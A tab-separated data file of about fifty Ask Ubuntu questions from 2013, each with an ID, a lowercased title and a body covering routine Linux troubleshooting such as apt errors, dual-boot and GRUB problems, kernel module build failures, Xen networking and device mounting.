303150	apt-get 403 forbidden , but accessible in the browser	i 've noticed that running apt-get update recently has resulted in quite a few ppa 's returning `` 403 forbidden '' . in and effort to clean them up i had a look : w : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu/dists/raring/main/binary-amd64/packages 403 forbidden w : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu/dists/raring/main/binary-i386/packages 403 forbidden e : some index files failed to download . they have been ignored , or old ones used instead . the strange things is , if i copy these urls into my browser i can access the files just fine . why would apt-get report `` 403 forbidden '' if they 're still accessible ? i tried re-adding the ppa through add-apt-repository which downloads the signing key again , and it still reported `` 403 forbidden '' .
303151	will ubuntu qml apps be cross-platform ?	i am creating a voice-chat app for ubuntu using the ubuntu sdk ; will it work on windows and mac in the future ? if not , i will be switching from using the sdk to plain qt or gtk .
303152	can not access the /usr/local/bin directory	i am installing software via the terminal . one of the installation steps requires to copy some binary files to the /usr/local/bin directory . using the following command : cp file1 file2 file3 usr/loca/bin i get the following message : cp : target `usr/local/bin ' is not a directory i also tried sudo but it then asks for the account password . when i try to enter the password , i can not type anything except press enter . i removed the password from the account but it keeps asking me for the sudo command . what should i do ? thanks in advance !
303157	13.4 and sony t2xp no launcher etc	i have a sony t2xp laptop with xp installed . i have installed 32bit ubuntu 13.4 as a dual boot but i have no launcher or toolbar . i have tried going through ccsm and re enabling unity but it never stays enabled and it does n't start the launcher . i realise this is an old laptop will it support this version of ubuntu ?
303160	unable to install dia on ubuntu 13.04	i tried to install dia from the software center and from the terminal ( dia and dia-gnome ) , but it did n't seem to work . i could n't find dia in the application menu and i also could n't find it by searching . any ideas ?
303162	ubuntu 12.04 & win7 64-bit : /dev/sda contains gpt signature	i have 2 options in bios legacy support ( enable/disable ) . its a recently purchased laptop and has the uefi option . i enabled legacy support and installed win7 64-bit successfully . then i booted ubuntu 12.04 ( 32-bit ) from a usb and into the live install . when i tried to install it says /dev/sda contains gpt signature no fake msdos partition detected and whether i select yes or no , none show the already existing partition . so what i did is i tried linux mint latest version ( 64-bit , i guess there is not much difference because both are based on debian ) , i get the same problem . then i formatted the disk from the live cd and it installed successfully . now when i tried to install win7 ( 64-bit ) , it gives an error like windows can not install since it do not have gpt partition . i need to be able to dual boot win7 ( 64-bit , because i only have drivers for it ) , and ubuntu or linux mint , ( 32 or 64-bit is ok ) . any suggestions , thanks in advance .
303163	difference between a 'runlevel ' or a 'multiuser runlevel ' ?	is there a difference when i say multiuser runlevel and when i say just runlevel ?
303164	what does the `` kvm disabled by bios '' message during the boot process mean ?	i get this message during booting of my laptop : [ 14.255596 ] kvm disabled by bios can someone explain this ?
303166	ubuntu 12.04/win7 dual boot - ubuntu boots fine , win7 boots to a blue screen of death	i 've been trying to install ubuntu 12.04 to dual boot alongside windows 7 on my lenovo ideapad u410 for a while now . the short version : at first i could n't boot anything . this was my non-working boot config : http : //paste.ubuntu.com/5719520/ i ran boot-repair , and afterwards i started getting the boot menu to choose between ubuntu and win7 . ubuntu now works , but win7 still does n't work . here is my current , repaired boot config : http : //paste.ubuntu.com/5719533/ the long version : the ideapad has an ssd in addition to the hdd and that got in the way initially . my /dev/sda/ ( a.k.a . disk 0 ) is some windows hibernate partition . /dev/sdb/ ( a.k.a . disk 1 ) is where all the real stuff is . the installer only ever saw /dev/sda until i did a few things : turned off intel rapid start technology , switched the mode from raid to compatible in the bios , and also removed dmraid before running the ubuntu installer . then it detected the existing operating system and let me install ubuntu alongside . i chose the option to have it ask me which os to boot into on startup every time . after the initial install , it kept trying to boot straight to windows instead of giving me a choice . it would hit a blue screen of death and then restart and try to run windows startup repair , which did n't fix anything ( see first link for my boot config at this point ) . then i ran boot-repair with the automatic settings , and now it pops open the menu on startup and lets me choose . if i choose ubuntu , it boots correctly . if i choose windows 7 , i still have the same problem : bsod and automatic restart . ( see second link for my current boot config ) any ideas how i can go about repairing the windows boot record ? the windows config with the various partitions is really obnoxiously complicated , so i 'm not sure how to proceed or what the root of the problem is .
303168	updated version 12.04 & now grub line command needed ; tab shows many unknown possibilities	my desktop for both operating system is dead in the water until the right grub command is entered . is this a commonplace situation after simply updating the system ? without a cure my only recourse is reinstalling windows ... ... .thanks in advance for any rescue help !
303171	unity launcher gui graphical issues	this is an on-going issue for me . it started when i ran the ubuntu updater and installed a 13.04 nightly build about 2 months ago . i did n't have time to fix it , so i let it go . about a week ago i downloaded the 13.04 release version . after a full fresh install , i still seem to have this issue . i ca n't understand why suddenly unity looks like this , even after i wiped my last ubuntu installation . is this something related to my gfx hardware , possibly ? btw , i should mention that this is the only place in the entire system the gui looks like this . if i close the launcher and leave just the sidebar open it looks totally normal .
303183	how to get the newest version of a package installed via apt-get ?	is there a way to install the latest release of a program other than building it from the source ? i know that the packages/applications in the ubuntu repositories are not always containing the most recent versions of programs to ensure best system stability . however , i would like to have a newer version of the program `` okular '' . they already released one last october but it is still not upgraded in the repositories . is there a way to get it with apt-get ? maybe adding some other `` unstable '' repositories or using a special parameter ?
303187	partially overwrite in a file through script	i see < command > > > < filepath > appends the command line to the file and < command > > < filepath > replaces the entire contents of the file with the command given passed . how to pass the command to the file so that only the last line of the file is overwritten ?
303196	problem with font in skype	has anybody experienced problems like the below in skype : the font of the time is broken . i have googled all day and found nothing similar to it . all other font in skype is okay except the time . i 'm using ubuntu 13.04 raring ringtail
303197	external microphone does n't work on a macbook pro 8,2 even though recording via internal microphone works fine	on my macbook pro 8,2 running kubuntu 12.10 , the internal microphone is doing just fine , but when i plug an external mic into line-in , nothing can be recorded , no matter what stream i put to maximum volume in alsamixer . is there a known fix ?
303201	broadcom wireless device not detected in ubuntu 12.10 but does in the live cd	i have a dell vostro 1400 . i have installed ubuntu 12.10 in it from live usb . i have tested from the usb and everything worked fine . i decided to install it to my hdd and after that my wifi device in not detected in the additional drivers tab which was there in the tab on the live usb . so how to enable the device again in my system . i can still use the device from the live usb .
303202	how to install gcc-4.3 for ns2	i want to install ns2 in ubuntu . i run the below command : sudo apt-get install build-essential autoconf automake libxmu-dev gcc-4.3 but i got an error : package gcc-4.3 is not available . . . e : package 'gcc-4.3 ' has no installation candidate . could you please provide me how to install gcc-4.3 [ step-by-step ] ? ?
303203	could someone tell me whether my os is communicating with the internet ?	i edited iptables so that when the vpn service is disconnected , no program will access the internet . well , i did an experiment . i disconnected the vpn service manually and immediately did a ping by issuing the following command : sudo ping www.yahoo.com below are the results : ping ds-any-fp3-real.wa1.b.yahoo.com ( 206.190.36.45 ) 56 ( 84 ) bytes of data . ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted ^c -- - ds-any-fp3-real.wa1.b.yahoo.com ping statistics -- - 8 packets transmitted , 0 received , 100 % packet loss , time 7056ms was any data including geolocation information sent out from my computer and received by the destination party during the ping session ?
303218	alternative to libreoffice base for ubuntu	is there a database management software for ubuntu alternative to libreoffice base ? lobase works fine for a while , but occasionally the files i 'm working on get corrupted and i lose all my work .
303222	apply iconv to all of the files in a directory	while trying to convert a collection of .srt files : iconv -f cp1256 -t utf-8 directory/* > target/* it converts all of the 22 files in the directory to one file in the target directory called * . i want the processed files to appear separately in the target directory . can anybody help ?
303226	ibus on xubuntu 12.04 how to adjust input method specific settings ?	i am on xubuntu 12.04 trying to get my pinyin input method in ibus to write traditional character . i know that there are suppose to be more preferences under each input methods but i am unable to access them . for example , when i select chewing in the ibus preferences menu , i can not select the preferences button in the input method tab to it to adjust settings specific to chewing . it is the same for the other input methods . another thing is that there is no `` lauguage bar '' , this is important to me as it would allow me to adjust some of the settings on the fly . hope i am clear enough ...
303228	how can i install a previous version of firefox as if it was the default ?	i noticed that firefox 21 does n't work in ubuntu 12.04 ( i upgraded ubuntu recently ) . it pops up a message which says : `` your firefox profile can not be loaded . it may be missing or inaccessible '' . i was looking for a solution and nothing worked for me . so i downloaded firefox 20.0.1 ( the .tar file ) , i installed it and it works , but i do n't know how to install it properly . i mean , when i install firefox from the terminal or ubuntu software centre it appears in the panel with its icon and all that . but installing it from the .tar file is just paste the extracted folder in some direction ( in my case /opt/firefox/firefox ) and to run firefox i need to go to that direction and clicking in the firefox file . what i really want to know is how can i install firefox so it seems to be as installed from terminal or ubuntu software centre , i mean , with its appropriate icon in the panel , and with the possibility to running it from terminal using the `` firefox '' command . or if necessary , in which system folder should i paste the extracted folder ?
303233	error ( dkms apport ) when upgrading kernel from 3.0.8 to 3.9.4	i 'm on ubuntu 13.04 and i am experiencing a lot of issues like : crash when waking up from suspend crash when logging out of session random crashes in unity ( not in i3wm ) slow boot some errors during boot i 've been working on this for a while , and someone suggested that it must be some sort of low level error and told me to try and update the kernel before i file a bug report . but when i try to update to the mainline kernel from kernel.ubuntu.com i get this error when installing the headers-generic-amd64 file : martinux @ g580 : ~/downloads $ sudo dpkg -i linux-headers-3.9.4-030904-generic_3.9.4-030904.201305241545_amd64.deb ( reading database ... 226254 files and directories currently installed . ) preparing to replace linux-headers-3.9.4-030904-generic 3.9.4-030904.201305241545 ( using linux-headers-3.9.4-030904-generic_3.9.4-030904.201305241545_amd64.deb ) ... unpacking replacement linux-headers-3.9.4-030904-generic ... setting up linux-headers-3.9.4-030904-generic ( 3.9.4-030904.201305241545 ) ... examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.9.4-030904-generic /boot/vmlinuz-3.9.4-030904-generic error ( dkms apport ) : kernel package linux-headers-3.9.4-030904-generic is not supported error ! bad return status for module build on kernel : 3.9.4-030904-generic ( x86_64 ) consult /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/make.log for more information . here is make.log dkms make.log for bcmwl-6.20.155.1+bdcom for kernel 3.9.4-030904-generic ( x86_64 ) sø . 02. juni 16:18:29 +0200 2013 make : entering directory `/usr/src/linux-headers-3.9.4-030904-generic' cfg80211 api is prefered for this kernel version using cfg80211 api ld /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/built-in.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/shared/linux_osl.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_linux.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_iw.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.o /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1578:2 : warning : initialization from incompatible pointer type [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1578:2 : warning : ( near initialization for ‘wl_cfg80211_ops.set_tx_power’ ) [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1579:2 : warning : initialization from incompatible pointer type [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1579:2 : warning : ( near initialization for ‘wl_cfg80211_ops.get_tx_power’ ) [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c : in function ‘wl_update_bss_info’ : /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:2025:3 : warning : passing argument 1 of ‘cfg80211_put_bss’ from incompatible pointer type [ enabled by default ] in file included from /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:33:0 : include/net/cfg80211.h:3302:6 : note : expected ‘struct wiphy *’ but argument is of type ‘struct cfg80211_bss *’ /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:2025:3 : error : too few arguments to function ‘cfg80211_put_bss’ in file included from /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:33:0 : include/net/cfg80211.h:3302:6 : note : declared here make [ 1 ] : *** [ /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.o ] error 1 make : *** [ _module_/var/lib/dkms/bcmwl/6.20.155.1+bdcom/build ] error 2 make : leaving directory `/usr/src/linux-headers-3.9.4-030904-generic' i 'm on a lenovo g580 and would like to know if there is a possible fix for this or if i should just file a bug report and install 12.10 in stead .
303234	dell inspiron 5521 i7-3317u fan cpu too noisy	i am having the problem with the fan speed with my new dell inspiron 5521 i7-3317u , full hd with installed ubuntu 12.04 . the fan is too noisy . after starting the laptop , the fan start and is not stopping or changing the revolutions at all . still i did n't install any windows just because the laptop is new . what should i do , to return the laptop or will updating the bios will solve the problem ? i saw that there is new version of the bios ao7 .
303237	how do i do xdcc downloads on the command line ?	i need a command line irc client ( e.g . irssi ) that can download files from a xdcc bot . i already tried irssi , joined the channel and requested a file from the xdcc bot using the usual /msg botname xdcc send # 123 , and the bot offered the file , but it said : please set your client to receive the file . i already searched for an answer , but i could n't find anything on how to accept files on a xdcc download . so , how do i download files from a xdcc bot using irssi or another command line client ? also , which port do i have to open in my firewall for a xdcc download ?
303238	how do i put apps on my desktop ?	i just installed gimp and mumble and many other things from synaptic and now my sidebar is getting a bit cluttered . i want to put gimp and other apps on my desktop not my side-bar . i also know that i can make a shell script to run it and add a picture to it but i dont really want to do that just have the whole app on the desktop .
303240	how to get aero transparency or glass in ubuntu 13.04 desktop ?	i found that ubuntu 's desktop has been very ugly and tacky compared my nicely modified windows 8 pc with aero forced into it . i want that on ubuntu , so that has tea parent ish edges . can i do this via the terminal ?
303242	xubuntu xfce context menu weird display	i tried to install 'gnome-shell ' through synaptic manager but i did n't like it so got it uninstalled ... however even after running 'autoremove ' & 'autoclean ' commands a problem persists & that is related to the context menu of both nemo & nautilus file browsers ( i got them installed instead of thunar ) . the problem is shown below however these weird lines do n't occur in the context menu of builtin thunar file browser ... but i never use it ! this problem also occurs in the context menu of synaptic packet manager also in the context menu at xfce desktop these weird lines too are absent
303244	big issue in ubuntu 13.04	i just installed ubuntu 13.04 . first i tried to just run the demo , but it was really slow , so i decided to just install it immediately . i cleared all previous files , deleting windows , and got ubuntu installed . my issue is basically that ubuntu does not work as it should at all . first of all the start-up is incredibly slow . takes about 1 minute , whilst last time i used 12.04 and 12.10 it took about 5-10 seconds . second issue is that the whole interface is really , really buggy . programs i open can not be minimized ; well , they can , but just disappear ( yet still running , so i can not re-open them.. firefox e.g ) . in addition to this , when i open a program i can not click in it with my cursor at all , until i ctrl+alt+delete and hit esc twice . problem is that once i can actually click within that specific window , i can not click anywhere else until i close it completely ( which i have to do with alt+f4 , because i can not even click the top-bar with the close , maximize & minimize buttons ) . once i have even touched the bar on the side ( with the programs ) i can never touch the desktop , nothing happens ; neither right-click nor left-click , and i am unable to ever click the icons in top-right corner of the screen to turn off/restart computer etc . a lot of issues , i know , but hopefully someone can help me . perhaps it is a faulty install disc ? burnt it today , so i am unsure .
303250	ubuntu 12.10 after installation ( d drive and e drive in windows system ) are missing !	after installing ubuntu 12.10 with installation option `` replace windows 8 with ubuntu '' i ca n't see any drive [ d : and e : ] mounted in ubuntu . they are not even under /mnt/ location . what the hell had happened ? when i looked under /dev location . i found 2 files : /dev/sda2 /dev/sda3 /dev/sda2 was appearing to be 150 gb in size . that equals to my entire harddisk . i 'm gettin ' mad . lol
303256	is there a specific folder for notification icons ?	is there a folder in /usr/share/icon which contains all the icons for the system tray ? i 'm not sure what size is used so i ca n't find it .
303258	fade in after inactive mode	using brightness & lock i can set the time when the computer will go to inactive mode : turn screen off when inactive for [ 1 minute ] . after the time set , the screen fades out and then it becomes black , completely . when i move the mouse or i press a key it turns on , again . is there any possible way to fade in the screen when it turns on from inactivity mode ?
303259	using rgb cable to view movies on tv	when i use an rgb cable to connect my laptop to the vizio tv i can only see the desktop , no folders or any other activity . however , once the cable is connected , the curser shows on the tv but not the laptop . how do i get the two to sync so i can use the larger tv to view videos/movies , etc. ? it works without any additional help through windows , but i do n't want to use windows ! thank you in advance for your help .
303262	can not open software center	abdul @ abdul-inspiron-3521 : ~ $ software-center 2013-06-02 21:53:50,082 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-06-02 21:53:50,088 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-06-02 21:53:50,089 - softwarecenter.db.database - error - failed to add apt-xapian-index traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/database.py '' , line 183 , in _get_new_xapiandb softwarecenter.paths.apt_xapian_index_db_path ) file `` /usr/lib/python2.7/dist-packages/xapian/__init__.py '' , line 3666 , in __init__ _xapian.database_swiginit ( self , _xapian.new_database ( *args ) ) databaseopeningerror : could n't stat '/var/lib/apt-xapian-index/index ' ( no such file or directory ) 2013-06-02 21:53:50,261 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-06-02 21:53:50,427 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-06-02 21:53:50,444 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 145 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : unable to parse package file /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages ( 1 ) , e : the package lists or status file could not be parsed or opened . 2013-06-02 21:53:50,784 - softwarecenter.db.categories - warning - sort by cataloged time requested but your a-x-i does not seem to support that yet 2013-06-02 21:53:51,173 - softwarecenter.db.categories - warning - sort by cataloged time requested but your a-x-i does not seem to support that yet 2013-06-02 21:53:51,277 - softwarecenter.db.categories - warning - sort by cataloged time requested but your a-x-i does not seem to support that yet 2013-06-02 21:53:51,327 - softwarecenter.db.categories - warning - sort by cataloged time requested but your a-x-i does not seem to support that yet 2013-06-02 21:53:51,378 - softwarecenter.db.categories - warning - sort by cataloged time requested but your a-x-i does not seem to support that yet 2013-06-02 21:53:51,434 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1420 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1350 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 168 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 237 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 504 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_top_rated ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 417 , in _append_top_rated top_rated_cat = self._update_top_rated_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 404 , in _update_top_rated_content docs = top_rated_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' abdul @ abdul-inspiron-3521 : ~ $
303263	will ubuntu 13.04 with gnome work on a dell optiplex gx 260	i have an old dell optiplex gx 260 and ubuntu 13.04 wont work on it . so im wondering if i get ubuntu 13.04 with gnome will it possibly work ?
303266	how do i point a domain to an ubuntu vps ?	i 've recently purchased a vps hosting ( rackspace ) and want to configure a domain for this account . i 've configured nginx and other stuff to run ruby on rails on it . and everything works perfectly when i reach it by its ip . i 've changed the domain dns servers at my domain registrant to point to my hosting . i 've been waiting for 48+ hours but still no luck . maybe i should add some configuration on the server side ? please help . thanks .
303270	how to change dash size in 13.04 ?	it appears that support had been dropped for configuring the dash size in the latest unity release , and now the desktop option has no effect ( i.e . netbook size is always used ) . just to illustrate , this is what i get regardless of the screen size or the configuration : i have tried to set it via ubuntu tweak , like so ( see dash size ) : and the unity tweak tool is already ignoring that option altogether : what 's more , the form-factor entry is missing from dconf-editor : i really like a. having the dash spreading on my entire desktop , and b. being able to configure it ( ! ) . is it really gone ?
303274	how can i set up two monitors	i am absolutely new on ubuntu.i am trying to set up dual monitors . i have two monitors and usb to dvi external dual or multi monitor video adapter ( http : //www.startech.com/av/usb-video-adapters/usb-dvi-external-multi-monitor-video-adapter~usb2dvie2 # dnlds ) and from this website , i have also downloaded its driver in .zip format . i am using ubuntu11.04 , can anybody help me to setup dual monitors ?
303276	folder transfer mac osx to ubuntu 12.04	i 'm trying to transfer files from my old mac osx to my new laptop running ubuntu 12.04 . i 've drag and dropped the folders onto an external hdd formatted as hfs+ . when i drag and drop these folders onto my ubuntu 12.04 desktop ( will sort them later ) some of the folders transfer fine whilst others do not as either a.the folder `` xxxxxxxxxxxxx '' can not be handled because you do not have permissions to read it or b . there was an error copying the file into /home/xxxx/desktop/xxxxx and under more info says error opening file : permission denied . 1 ) if it 's a matter of alt-f2 and running gksu nautilus why do some folders require this whilst others do not ? 2 ) what 's the underlying basis for this need ? 3 ) is there an easier recommended way for transferring my files over from macosx to ubuntu ? thanks in advance t
303277	multitouch does n't work on touchpad on acer spire v3 771g	i was trying to install psmouse all day . i 've found lots of tutorials but none work . for example https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/681904/comments/64 in this i have the following message kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . make kernelrelease=3.8.0-23-generic -c /lib/modules/3.8.0-23-generic/build m=/var/lib/dkms/psmouse/elantech-v6/build/src psmouse.ko ... . ( bad exit status : 2 ) traceback ( most recent call last ) : file `` /usr/share/apport/package-hooks/dkms_packages.py '' , line 22 , in < module > import apport importerror : no module named apport error ! bad return status for module build on kernel : 3.8.0-23-generic ( x86_64 ) consult /var/lib/dkms/psmouse/elantech-v6/build/make.log for more information . next for example here http : //forums.debian.net/viewtopic.php ? f=16 & t=95940 after autoinstall i have an error which say error ! could not locate dkms.conf file . file : does not exist . people help me , i wasted all day to to run such a simple thing .
303281	how to setup non-local bridged network for xen ?	i 've had an absolute nightmare the past 5 days trying to set up the proper bridged networking for xen . i 've tried so many guides and all have failed to provide a solution for my specific question . the ips i need to configure : first usable : 198.xx.xxx.74 last usable : 198.xx.xxx.78 2nd first usable : 198.xx.xxx.18 2nd last usable : 198.xx.xxx.22 i need 8 total usable ip 's , 7 for individual dedicated ip 's for servers and 1 to access the dom0 . my current interfaces file : auto xenbr0 iface xenbr0 inet manual bridge_ports eth0 bridge_stp on bridge_maxwait 0 bridge_fd 0 auto eth0 iface eth0 inet static address 198.xx.xxx.74 netmask 255.255.255.248 gateway 198.xx.xxx.73 auto eth0:1 iface eth0:1 inet static address 198.xx.xxx.75 netmask 255.255.255.248 auto eth0:2 iface eth0:2 inet static address 198.xx.xxx.76 netmask 255.255.255.248 auto eth0:3 iface eth0:3 inet static address 198.xx.xxx.77 netmask 255.255.255.248 auto eth0:4 iface eth0:4 inet static address 198.xx.xxx.78 netmask 255.255.255.248 auto eth1 iface eth1 inet static address 198.xx.xxx.18 netmask 255.255.255.248 auto eth1:1 iface eth1:1 inet static address 198.xx.xxx.19 netmask 255.255.255.248 auto eth1:2 iface eth1:2 inet static address 198.xx.xxx.20 netmask 255.255.255.248 auto eth1:3 iface eth1:3 inet static address 198.xx.xxx.21 netmask 255.255.255.248 auto eth1:4 iface eth1:4 inet static address 198.xx.xxx.22 netmask 255.255.255.248 aside from the xenbr0 interface , the file was configured by host ( secured servers , who refused to help with ( understandable , it 's unmanaged hosting ... ) ) . the result of brctl show : bridge name bridge id stp enabled interfaces xenbr0 8000.002590c30f2a yes eth0 vif5.0 using xm create /etc/xen/testvm.cfg , i was able to start the domu but it 's not accessible through the network . the result of xm list : name id mem vcpus state time ( s ) domain-0 0 2500 8 r -- -- - 46.6 testvm 5 4300 1 -b -- -- 1.9 the /etc/xen-tools/xen-tools.conf config ( summed ) : gateway = 198.xx.xxx.73 netmask = 255.255.255.248 broadcast = 192.168.0.255 ( i was n't sure what this was supposed to be ) dist = lucid ( 10.04 , i need to get the 12.04 , but thats not important now ) the /etc/xen/testvm.cfg networking : vif = [ 'ip=198.xx.xxx.19 , mac=xx : xx : xx : xx : xx : xx' i copied everything by hand , because i do not have ssh access since the networking is severely broken . i can only access the server though the unreliable ikvm viewer . i would provide a ifconfig but i unfortunately can not provide it , i 'll provide anything else you guys need to help . i 'd extremely appreciate a specific guide to fix this as it would definitely help others in the future , however linking to other guides which are similar to what i need is still appreciated . thanks for viewing , hopefully you can help with my nightmare : ) .
303290	where is usr/local ?	i ran the following code in a terminal : python -c `` import sys sys.path = sys.path [ 1 : ] import django print ( django.__path__ ) '' this returns the following path : [ '/usr/local/lib/python2.7/dist-packages/django ' ] but i simply can not find usr/local ( from the gui ) . where should it be ? i 'm not sure what other information would help , please let me know !
303291	dual boot lost , how can i enter in ubuntu again ?	i have a notebook and , while in windows 8 , a updater software that came with it updated the bios and now i can only access windows . how can i restore the boot options ? my note has uefi and i had some problems with dual boot with it . the problem can be seen in this question : invalid efi file path on windows 8 someone knows how can i restore the dual boot with windows 8 and ubutu ? sory if my english is bad .
303293	change sound pitch ubuntu 13.04	so i was just on my laptop one day when i went on youtube and the music went all high pitched . so i tried another few songs and their pitches had gone up too . anyone want to help ? if this is any help , the same day i tried to change my swappiness and that 's when it started thanks in advance , stupot65
303298	how to fix start up error using lenovo z580 ?	laptop lenovo z580 with 8 ram and intel® core™ i5-3210m , with ubuntu 64 bits the system hangs at start up stage , but sometimes loads after 3 or 4 times . how to fix this trouble ?
303299	13.04 wo n't boot after update	i have a laptop with a dual-boot configuration , windows 7 in one partition , ubuntu 13.04 on the other . it was working fine for months , but now , after one of ubuntu 's recommended updates , it wo n't work anymore . when i boot into windows , everything works fine , but when i try to boot into ubuntu , the screen stays black with just a blinking white underscore as if it was a command prompt . ( it wo n't accept any typing , though ) . can anyone help ? i saw some solutions that mention grub , but i do n't know how to access that , or even if i have that . when i turn on the computer , i have a menu similar to this one : but instead of microsoft windows vista , the options are `` windows 7 '' and `` ubuntu '' . if i choose ubuntu , i 'm stuck on a black screen with a blinking prompt .
303301	can not auto mount nas running samba on 12.04	i have tried to auto mount my nas running samba with the following modifications to my fstab file without any luck : //10.0.1.4/nas /home/wayne/nas smbfs rw , username= , password= , uid=1000 0 0 the nas has no username and password and can be manually mounted in nautilus .
303304	changing dvd settings .	it looks like i made a mistake on my settings . i want to install a program , but the computer thinks that i want to watch a video . is it possible to change the settings ?
303305	external sound card stops functioning after suspend	after reading : re : can not suspend or hibernate asus desktop ubuntu 12.04 i got the suspend working on a desktop . the only problem is that the external sound card that i have ( audiophile 2496 ) stops functioning . after suspend it is not even listed as an option in the sound settings . after restarting ( killing ) pulseaudio it appears again but does not seem to give any audio as an output . i tried also to reload the module for the card ( snd_ice1712 ) but i only get error : module snd_ice1712 is in use forcing to remove the module only gives error : removing 'snd_ice1712 ' : resource temporarily unavailable does anyone have any ideas how to reload the sound card and get it up and working ? the release is ubuntu 12.04 .
303309	ca n't mount usb devices , shut down etc . as a user	i tried gnome3 and gnome3-staging ppas to test running gnome 3.8 . after a while i decided that gnome 3.8 was n't for me , so i did a ppa-purge of both the ppas . as described in gnome3-staging ppa page , i also did : $ sudo apt-get purge libpam-systemd $ sudo apt-get install libpam-xdg-support the trouble is , i ca n't mount my external usb device anymore . when i try to mount it as a user , it fails : $ udisks -- mount /dev/sdc1 mount failed : not authorized i am logged in an xfce session , but the same thing happens in a fallback gnome session , or from a unity session . also , in xfce , `` suspend '' and `` shut down '' menus are grayed out . i ca n't also open synaptic package manager from xfce menus ( sudo synaptic works ) . after a lot of searching , it seems like it is a policykit issue . i see the following in my ~/.xsession-errors : ( polkit-gnome-authentication-agent-1:5805 ) : polkit-gnome-1-warning ** : unable to determine the session we are in : no session for pid 5805 pid 5805 does n't exist . if i try to start polkit-dnome-authentication-agent-1 from an xterm , i get the same error ( different pid ) : $ /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 ... 